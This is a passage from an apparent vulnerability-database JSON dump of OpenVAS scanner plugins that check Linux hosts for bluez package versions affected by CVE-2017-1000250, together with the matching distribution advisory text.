Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2685\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-September/022535.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-hid2hci\", rpm:\"bluez-hid2hci~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs-devel\", rpm:\"bluez-libs-devel~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:22", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310873368", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873368", "title": "Fedora Update for bluez FEDORA-2017-fe95a5b88b", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_fe95a5b88b_bluez_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for bluez FEDORA-2017-fe95a5b88b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873368\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 07:41:48 +0200 (Thu, 14 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bluez FEDORA-2017-fe95a5b88b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bluez on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-fe95a5b88b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AWVMZIXGZ564SXHHRWGEALD7LRSJGI5Q\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.46~6.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:16", "bulletinFamily": "scanner", "description": "Check the version of bluez", "modified": "2019-03-08T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310882765", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882765", "title": "CentOS Update for bluez CESA-2017:2685 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2685_bluez_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for bluez CESA-2017:2685 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882765\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:16:22 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bluez CESA-2017:2685 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of bluez\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). A specially crafted Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2685\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-September/022531.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-alsa\", rpm:\"bluez-alsa~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-compat\", rpm:\"bluez-compat~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-gstreamer\", rpm:\"bluez-gstreamer~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs-devel\", rpm:\"bluez-libs-devel~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811768", "title": "RedHat Update for bluez RHSA-2017:2685-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2685-01_bluez.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for bluez RHSA-2017:2685-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811768\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:15:51 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bluez RHSA-2017:2685-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). A specially crafted Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2685-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-September/msg00028.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-debuginfo\", rpm:\"bluez-debuginfo~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-debuginfo\", rpm:\"bluez-debuginfo~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310843301", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843301", "title": "Ubuntu Update for bluez USN-3413-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3413_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bluez USN-3413-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843301\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:16:53 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for bluez USN-3413-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that an information\n disclosure vulnerability existed in the Service Discovery Protocol (SDP)\n implementation in BlueZ. A physically proximate unauthenticated attacker could\n use this to disclose sensitive information. (CVE-2017-1000250)\");\n script_tag(name:\"affected\", value:\"bluez on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3413-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3413-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:57", "bulletinFamily": "scanner", "description": "An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.", "modified": "2019-03-18T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310703972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703972", "title": "Debian Security Advisory DSA 3972-1 (bluez - security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3972.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3972-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703972\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-1000250\");\n script_name(\"Debian Security Advisory DSA 3972-1 (bluez - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 00:00:00 +0200 (Wed, 13 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3972.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"bluez on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\n\nWe recommend that you upgrade your bluez packages.\");\n script_tag(name:\"summary\", value:\"An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bluetooth\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-hcidump\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-obexd\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-scripts\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-tools\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluetooth\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-hcidump\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-obexd\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-scripts\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"5.23-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:31", "bulletinFamily": "scanner", "description": "The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive information\nfrom the bluetoothd process memory. This vulnerability lies in the processing\nof SDP search attribute requests.", "modified": "2019-03-18T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891103", "title": "Debian LTS Advisory ([SECURITY] [DLA 1103-1] bluez security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1103.nasl 14281 2019-03-18 14:53:48Z cfischer $\n#\n# Auto-generated from advisory DLA 1103-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891103\");\n script_version(\"$Revision: 14281 $\");\n script_cve_id(\"CVE-2017-1000250\");\n 